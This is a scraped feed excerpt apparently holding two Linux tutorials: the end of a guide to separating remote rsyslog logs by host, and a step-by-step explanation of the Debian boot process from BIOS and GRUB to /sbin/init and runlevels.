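To have something easy to spot when checking on the server, you can generate a test entry from the client with logger:

# logger "remote logging test"

This message should appear among the remote logs described in the next section.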

On the server side:

Now you can check the logs inside /var/log; when opening them you’ll notice mixed sources in your log. The following example shows logs from Amazon’s internal interface and from the rsyslog client (Montsegur):

A zoom shows it clearly:

Having mixed files isn’t comfortable; below we will edit the rsyslog configuration to separate logs according to their source.

To separate logs into a directory named after the client host, add the following lines to the server’s /etc/rsyslog.conf to instruct rsyslog how to save remote logs; within rsyslog.conf add the lines:

$template RemoteLogs,"/var/log/%HOSTNAME%/%PROGRAMNAME%.log"
*.* ?RemoteLogs
& ~

Exit saving changes by pressing CTRL +X and restart rsyslog on the server again:

# sudo service rsyslog restart

Now you can see new directories, one called ip-172.31.47.212, which is the AWS internal interface, and another called “montsegur”, like the rsyslog client.

Within the directories you can find the logs:

Conclusion:

Remote logging offers a great solution to a problem which can bring services down if the server storage becomes full of logs. As said in the beginning, it is also a must in some cases in which the system may be seriously damaged and not allow access to logs; in such cases a remote log server guarantees the sysadmin access to the server history.

Implementing this solution is technically pretty easy and even free, considering high resources aren’t needed and free servers like AWS free tier instances are good for this task. If you need to increase log transfer speed you can allow the UDP protocol only (at the cost of reliability). There are some alternatives to rsyslog, such as Flume or Sentry, yet rsyslog remains the most popular tool among Linux users and sysadmins.

I hope you found this article on how to send Linux logs to a remote server useful.

]]>
Understanding Debian Boot Process Step by Step https://linuxhint.com/debian_boot_process/ Wed, 22 Jan 2020 20:01:48 +0000 https://linuxhint.com/?p=53922 This article explains the Debian Linux boot process step by step, starting from the BIOS up to the /sbin/init execution, including the boot loader and /init.

The first software to be executed when you turn on your PC is the BIOS, followed by the boot loader (GRUB on Debian, LILO on other systems), usually installed in the MBR (Master Boot Record). The boot loader then runs the /init program with the initramfs image in memory as the temporary root file system, which in turn executes /sbin/init while switching the root file system to the disk.

Let’s start with each step, beginning with the BIOS.

The Debian Boot Process: The BIOS

The BIOS is the first software interacting with the hardware; it initializes all devices depending on its configuration, which we can usually access by pressing Del or F2.

From the BIOS configuration we can define how the boot process will continue; usually the BIOS configuration panel contains a menu dedicated to the boot process in which we can define whether the next step will be to boot from the hard disk, an external drive or USB stick, an optical disk like a DVD, a network boot, etc.

As said before, the BIOS initializes the hardware, and its configuration panel lets us enable and disable certain hardware either permanently or only during the boot process.

The BIOS also contains information on the hardware temperature, cooler health, RAM, storage devices, virtualization support, processor and cores, among other options.

Working with the BIOS is almost always among the first steps when troubleshooting a PC. In IT security the BIOS plays a key role in preventing local vulnerability exploitation; a wrong configuration may lead to security and functional failures.
In a usual Debian boot process, the next step after the BIOS initialization is the boot loader, which occupies the second step in the process.

The Debian Boot Process: The Boot Loader

Within the first sector of a storage device lies the MBR (Master Boot Record), which contains the partition table and the initial boot code. Many users confuse the MBR with the boot loader: the MBR is a defined location within a block device, while the boot loader is a higher level program which the user can easily manipulate. The boot loader is what Debian users know as GRUB; other Linux users may know it as LILO or SysLinux, and Windows users as the Windows Boot Manager.

From the boot loader we can determine how the next steps will be carried out: we can define different operating systems, kernels and startup parameters.

By default Debian uses GRUB as its boot loader. GRUB's configuration is defined in /etc/default/grub (and the scripts under /etc/grub.d), and the boot loader must be updated by running the command update-grub to regenerate /boot/grub/grub.cfg and apply any change.
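For example, a typical change such as altering the boot menu timeout consists of editing the GRUB_TIMEOUT line in /etc/default/grub and regenerating the configuration:

# nano /etc/default/grub

# update-grub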

The boot loader allows us to boot in recovery mode or mount the OS with root privileges to fix issues or reset passwords; as with the BIOS, the GRUB loader is also of interest for IT security.

Just like the BIOS defines the steps for the boot loader, the boot loader defines the settings for the /init process which prepares the PC for the last step.

The Debian Boot Process: The /init

The /init is a shell script executed from within the initramfs (an initial RAM file system packed as a compressed cpio archive); it prepares the temporary root file system and then hands control over to /sbin/init while switching to the real root file system.

The Debian Boot Process: The /sbin/init

Here is where the OS initializes. Runlevel N (boot) runs only the scripts necessary to pass to runlevel S (single user), which finishes initializing the hardware, and then the system switches to a runlevel ranging between 2 and 5 to start system services.
Below you can see a list including all runlevels and their meaning:

RunLevel N: none (system boot).
RunLevel 0: shutdown, its directory is /etc/rc0.d/.
RunLevel 1: single user, its directory is /etc/rc1.d/.
RunLevel 2: multi user without networking, its directory is /etc/rc2.d/.
RunLevel 3: multi user with networking, its directory is /etc/rc3.d/.
RunLevel 4: multi user with networking, its directory is /etc/rc4.d/.
RunLevel 5: multi user with graphics (X11), its directory is /etc/rc5.d/.
RunLevel 6: reboot.

The runlevel directories link to scripts located in /etc/init.d/, the directory where an administrator can place scripts to be executed at boot.
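You can check which runlevel the system is currently in and list the scripts linked for it, for example for runlevel 2:

# runlevel

# ls /etc/rc2.d/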

The /sbin/init is the last step in the boot process of Debian Linux and derived distributions; it brings the OS up to the proper runlevel.

This boot process is really simple to understand; any user, even one not familiar with Linux, already knows steps like the BIOS and the boot loader.

I hope this article helped you understand the Debian boot process step by step.

]]>